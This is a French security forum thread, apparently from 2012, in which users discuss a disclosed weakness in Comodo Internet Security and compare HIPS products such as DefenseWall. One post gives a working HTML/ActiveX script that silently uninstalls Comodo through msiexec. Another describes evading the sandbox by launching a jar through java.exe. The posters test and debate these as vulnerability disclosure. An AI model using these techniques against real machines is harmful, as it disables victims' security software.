169 replies to this topic

[EboO]

Ça me rassure, c'est le genre de faille qu'Iliya a du guetter. Par contre defensewall ne sandbox rien, il applique des polices de restriction avec des droits plus ou moins étendus sur les fichiers. Ceux untrusted ayant bien sur le moins de droits. Le rollback efface les fichiers untrusted, d'où l'obligation d'autoriser manuellement certains fichiers en vue d'une update par exemple.

[tma86]

Voui, Defense Wall que j'ai testé est vraiment un HIPS très puissant, mais pas de 64 bits à l'horizon

 

Sinon OSSS ( hXXp://www.online-solutions.ru/en/products/osss-security-suite.html ) est aussi pas mal du tout mais le nombre de pop est... digne de comodo 3 ...

[EboO]

Osss est infernal en effet mais c'est un sacré outil de sécurité.
A propos de defensewall Ilyia planche sur une version 64 bits mais je n'ai pas plus d'infos. En tout cas il cherchait comment contourner le patchguard et ne sortir une version 64 bits que si elle offre le même niveau de protection que la version 32 bits. Du sérieux en somme.

[cochontetram]

Aller, comme j'en ai marre de ce que je lis ici et là, je dévoile le script, j'en ai d'autre de toute façon.

 

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">
 
<html>
<head>
<script language="JavaScript" type="text/javascript">
 
function run()
{
var wshShell = new ActiveXObject("WScript.Shell");
wshShell.Run("C:\\WINDOWS\\system32\\msiexec.exe /x{E62381A7-B1C1-4121-8262-84D38C77786C} /quiet /norestart", 1, true);
}
 
</script>
</head>
<input type="button" value="Lancer" onclick="run()">
</body>
</html>

 

Cette section {E62381A7-B1C1-4121-8262-84D38C77786C} doit correspondre à votre version, vous le verrez dans le lien de désinstallation de CIS en l'éditant.

 

Je pense que les plus connaisseurs rigoleront bien de ce truc, moi même je trouve ça lamentable à la base. Au pire j’essaierai de faire mieux la prochaine fois.

C'est déjà publié chez comodo est d'autre, bon je sais qu'ils vont corriger ça très vite sans avoir compris le point derrière comme il y a deux ans, mais bon, on ne pourra pas dire que j'y ai mis de la mauvaise volonté.

 

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

 

Bonjour Shaoran, Bonjour à tous,

 

Merci pour le Script, j'ai donc effectué un test avec firefox et noscript et celui si le bloque bien, on peut toujours cliquer sur le bouton lancer le script ne s'execute pas.

 

 

 

Avec IE nous avons aussi un message d'alerte et cela fait la même chose, tu ne peux pas le lancer.

 

Edit : Pour avoir ce message le contenu actif doit être décoché ( paramétrage de IE par défaut )

 

 

 

Et enfin si nous passons en mode Paranoia et tu lances le script, Comodo affiche une alerte ( Si tu lances IE normalement pas d'alerte )

 

Edit : Lorsque j'ai lancé le script avec le mode parano, cette alerte est apparue et à bloqué le script, par contre pourquoi une clé de registre Winword.exe ???

 

Edit 2 : Au final ce sont 3 alertes qui bloquent temporaiement l'execution du script. En effet une fois bloqué le bouton apparaît quand même !!!

 

Edit 3 : Les 3 alertes doivent d'être liées à l'éditeur HTML de IE

 

 

 

J'espère que cela va rassurer les utilisateurs de Comodo d'une certaine manière.

 

Cordialement

 

Cochontetram

Ce message a été modifié par cochontetram - 04 décembre 2012 - 22:09 .

[Shaoran]

Le script n'est pas compatible avec firefox, seulement avec IE, c'est donc normal s'il ne se passe rien. Quand au mode paranoïa, ouais en effet, car la liste blanche n'est plus utilisée comme déjà dit. Mais vu le nombre de pop up ...

[cochontetram]

Merci pour ta réponse Shaoran

 

Effectivement le Script  n'est pas compatible avec firefox ( désolé ), mais ce qui est intéréssant c'est le blocage effectué par No-Script, de plus on voit aussi un message d'alerte pour empêcher l'execution du script sous IE.

 

Pour le mode Paranoïa, il a au moins le mérite d'être là et de faire son taf même s'il génère beaucoup de pop_up 

 

J'espère que cela va de nouveau rassurer les utilisateurs de Comodo

 

++ Cochontetram

Ce message a été modifié par cochontetram - 03 décembre 2012 - 19:05 .

[cochontetram]

Bonjour à tous, bonjour Shaoran, Vigen

 

PC Personnel : Windows Seven Entreprise X64, IE 9, CIS 5 et système à jour.

 

Je rebondis sur mon dernier post pour faire un petit récapitulatif.

 

1- Le Script n'est pas compatible avec les autres navigateurs, mais ce qui peut être retenu c'est le blocage effectué par No-Script pour Firefox,

 

 

2- Avec IE nous avons deux messages lorsque nous lançons le script, le premier message (en bas) :

 

Edit : Pour avoir ce message le contenu actif doit être décoché ( paramétrage de IE par défaut )

 

 

 

Le deuxième message d’alerte d'IE :

 

 

3- Du côté de Comodo, passons en mode Panoraïa et lançons le script. CIS affiche une alerte (Si nous lançons IE normalement pas d’alerte) :

 

Edit : Lorsque j'ai lancé le script avec le mode parano, cette alerte est apparue et à bloqué le script,  par contre pourquoi une clé de registre Winword.exe ???

 

Edit 2 : Au final ce sont 3 alertes qui bloquent temporairement l'execution du script. En effet une fois bloqué le bouton apparaît quand même !!!

 

Edit 3 : Les 3 alertes doivent d'être liées à l'éditeur HTML de IE

 

 

 

Mais le plus intéressant et cette alerte de Comodo, si vous avez autorisé les deux alertes d'IE. En effet CIS affiche une alerte qui indique qu’IE veut lancer notre ami msiexec.exe :

 

 

 

J’espère que ce petit récapitulatif va définitivement rassurer les utilisateurs de Comodo, car su mon PC personnel CIS est toujours en vie.

 

PS : Je sais qu’aucune solution de sécurité n’est fiable à 100% et que chacune d’entre elle possède leurs lots de problèmes, bugs, exploits, mais il existe aussi des moyens simples pour se rassurer et s’en protéger.

 

D’ailleurs il est important que des utilisateurs continuent à mettre en avant les problèmes, les bugs, et les exploits de nos tendres solutions de sécurité

 

++

 

Cochontetram

Ce message a été modifié par cochontetram - 05 décembre 2012 - 19:19 .

[Txon]

Super ! 

Nous voici en grande partie rassurés !

 

@+

[EboO]

On parle du mode paranoïa, qui monitore tout mais l'état de la souris et du doigt ne seront pas rassurant longtemps.
Le débat s'est déporté sur wilders security où certains membres semblent s'inquiéter du problème contrairement au forum de comodo... (Dont on ne doute pas que la prochaine release bloquera ça)

[loumax]

Pas de panique, ce genre de faille n'était jusqu'à présent pas exploitée

 

Bon d'accord, il ne faut pas douter que dans un future proche elle le sera certainement, et devant la super réactivité des labos Comodo , il vous reste toujours l'option énoncée par Cochontetram ...

 

 

 

[mode connerie]Peut-être leur suggérer d'inclure No-Script dans leur installateur [/mode connerie]

 

 

[Kna]

Aller, comme j'en ai marre de ce que je lis ici et là, je dévoile le script, j'en ai d'autre de toute façon.

.../...
wshShell.Run("C:\\WINDOWS\\system32\\msiexec.exe /x{E62381A7-B1C1-4121-8262-84D38C77786C} /quiet /norestart", 1, true);

.../...

Je pense que les plus connaisseurs rigoleront bien de ce truc, moi même je trouve ça lamentable à la base. Au pire j’essaierai de faire mieux la prochaine fois.

 

 

Sapristi ! Alors là quand même...

Je m'attendais à quelque chose d'un peu plus velu !

 

En fait, on se débarasse de Comodo (oui oui, et d'autres) comme je le fais (en plus rustique) dans mes installs silencieuses pour virer par exemple une toolbar Ask qui s'incruste avec un freeware !

Bien vu Shaoran

 

Bien que je sois d'accord avec ce qui a déjà été dit, qu'aucune solution n'est infaillible, et qu'il ne sert à rien de se fier aux tests faits par Y je jour X, car le ledemain les résultats pourrons très bien être à l'exact opposé, ça conforte tout à fait ce que je pense de Comodo, en gros depuis "l'affaire shaoran".

A savoir que ces gens ne sont pas crédibles. Il y a probablement dans l'équipe des codeurs de talent et des bonnes volontés, et les interfaces récentes sont assez plaisantes à mon goût. Mais avec un gourou de secte à la tête, et un comportement bordélique à de nombreux niveaux, sans parler de leurs pratiques douteuses consistant à détourner les résultats de produits concurents à leur avantage en voulant jouer sur les mots et les lois... ça fait maigre.

A mon goût il est clair que crédibilité en terme de professionalisme pour des gens censés oeuvrer dans la sécurité informatique = ZERO.

Et peu m' importe que Pierre Paul ou Jacques ne fassent pas mieux ou pire.

Ce n'est que mon avis, svp pas de fight inutile ici.

 

Et merci à ceux qui savent faire avancer les choses, avec modestie et simplicité

[spywar]

"sans parler de leurs pratiques douteuses consistant à détourner les résultats de produits concurents à leur avantage" Source ?

[EboO]

Si on édite les règles dans défense+ en interdisant aux navigateurs certaines actions ça doit pouvoir bloquer non ? On peut créer ds exceptions, sachant que c'est via un script ça le parait jouable mais je ne connais pas assez le produit non plus.
Concernant les autres applications par lesquelles ça pourrait passer je ne vois pas comment faire.

[tma86]

"Osss est infernal en effet mais c'est un sacré outil de sécurité.
A propos de defensewall Ilyia planche sur une version 64 bits mais je n'ai pas plus d'infos. En tout cas il cherchait comment contourner le patchguard et ne sortir une version 64 bits que si elle offre le même niveau de protection que la version 32 bits. Du sérieux en somme."

 

Voui, c'est du solide OSSS et DW. Contourner patchguard ? Bin lol, faudrait demander aux auteurs de malware qui le font En tout cas ca demande du taf aux dev de la faire proprement car même Emsisoft n'a pas sortie sa version d'OA qui devrait soit disant être "full 64 bits" selon Fabian Worsar.

 

Au fait, patchguard était plus costaud sur W7 que sur Vista et sur W8, qu'en est-il? Ils ont seulement rajouté secure boot ou bien?

Ce message a été modifié par tma86 - 06 décembre 2012 - 18:52 .

[Shaoran]

Il faudrait par contre peut être comprendre que IE est une voie d’accès, qu'activeX en fait parti, mais que tout le système complet est une voie d'accès.

Autrement dit, s'il existe une faille de sécurité comme un dépassement de mémoire tampon sous VLC qui serait enclencher par une vidéo. Cette vidéo serait un trou utilisable par cette faille.

Même chose pour un tableau excel ou odt.

Même chose pour un plugin que ce soit sous IE, Firefox, Chrome, WLM et j'en passe des meilleurs.

 

 

 

En gros, l'idée à retenir la dedans c'est que si une menace utilise un exécutable présent dans la liste blanche pour se propager, il va se confronter volontairement ou non à cette faille et la protection ne dira rien. Donc comme je le disais du temps de mon exploit java, arrêtez de parler de java (IE) et voyez le cœur du problème. Pas mes démonstrations codées à la va vite. Elle sont là pour montrer un raisonnement que j'ai eu à la sortie de la béta de CIS4, sachant que j'ai un raisonnement très scientifique en général. Rappelez vous des cours de démonstrations en mathématique, c'est super pratique dans la vie de tous les jours en faite, on est bien loin de quand on se faisait chier en cours.

 

C'est ici une preuve par l'exemple : http://fr.wikipedia....e_par_l'exemple

 

Ce que l'on sait de base :

 

Toute application dans la liste sûre peuvent faire tout ce qu'elle veulent.

Toute application dans les liste non sûre ne peut rien faire

Toute application inconnue est soumise aux décision de l'utilisateur ou restreint par la sandbox

 

 

Ce que l'on cherche à démontrer :

 

Si une application sûre exécute un code malveillant, la protection n'agira pas.

 

 

Ici la démonstration est de le prouver au moins une fois, ce qui était très pertinent avec mon premier exploit.

 

Le code est contenu dans un fichier jar (ie fichier exécutable java)

 

Si j’exécute directement le fichier jar, la sandbox réagi ou bien l'hips réagi. (commande : mon_fichier.jar)

Si je lance l’exécutable en passant par l'exécutable java, la protection ne fait rien (commande java.exe -jar mon_fichier.jar)

 

 

De fait, avec un essais cela passe, le raisonnement tient la route, de fait c'est reproductible, c'est ce que j'ai fait avec IE. C'est aussi ce que j'ai fais récemment avec firefox.

Naturellement, si on prenait le temps, on pourrait faire une excellente démonstration sans avoir de pop up à l’écran ou de problème de droits sous vista et seven. Sauf que ce genre de travail demande du temps et que je préfère utiliser le mien sur des choses plus utiles sachant pertinemment que ce soit Comodo ou emisoft, les deux ont réagit pareils aux première failles et on juste colmater l'exploit montré sans prendre en compte le vrai problème soulever et le raisonnement qu'il y a derrière.

[EboO]

Defensewall a bien une liste blanche lui aussi et pourtant il protège correctement. Reste à connaître son niveau de protection face à ta technique d'attaque si tu la lances via une application trusted (sachant que le navigateur est untrusted).

[Shaoran]

Je crois surtout du peu que je constate que defensewall ne travail pas comme les autres.

 

Si l'on prend CIS / OA, on part d'une liste de fichiers inconnus que l'on reparti en sûr et non sûr. Sachant que montrer qu'un fichier est réellement sûr ... comme montré, c'est plus complexe que cela ne semble.

 

Si l'on prend defensewall, j'ai plus l'impression qu'il part du principe que tout est sûr (ou non surveillé) et de là, il retire ceux qui peuvent être vecteurs de menaces. Auquel cas, c'est bien plus simple à gérer, et bien plus sûr comme raisonnement. A voir après les contrainte d'un tel système.

[EboO]

Defensewall a le raisonnement suivant : tout ce qui est connecté ou qui a un accès au net est potentiellement sujet à risque d'où le status untrusted.
Le reste est trusted.
Pas de virtualisation, que des restrictions et le rollback pour revenir à un état antérieur (à consommer avec modération).

[Shaoran]

Je ne pense pas qu'on l'on puisse dire tout ce qui est connecté à internet. Dans le cas de cmd par exemple, ce dernier ne peut pas se connecter à internet (c'est bien l'un des problème de Windows enfin corrigé par powershell d'ailleurs). Par contre, c'est l'un des principaux vecteurs d'attaques et il est bien non sûr par défaut.

[EboO]

Tout ce qui vient du net est source de problème, mais il y a aussi une sorte de blacklist il me semble. Sûrement que tout n'est pas dévoilé mais vu ses résultats je pense qu'il y a bien réfléchi.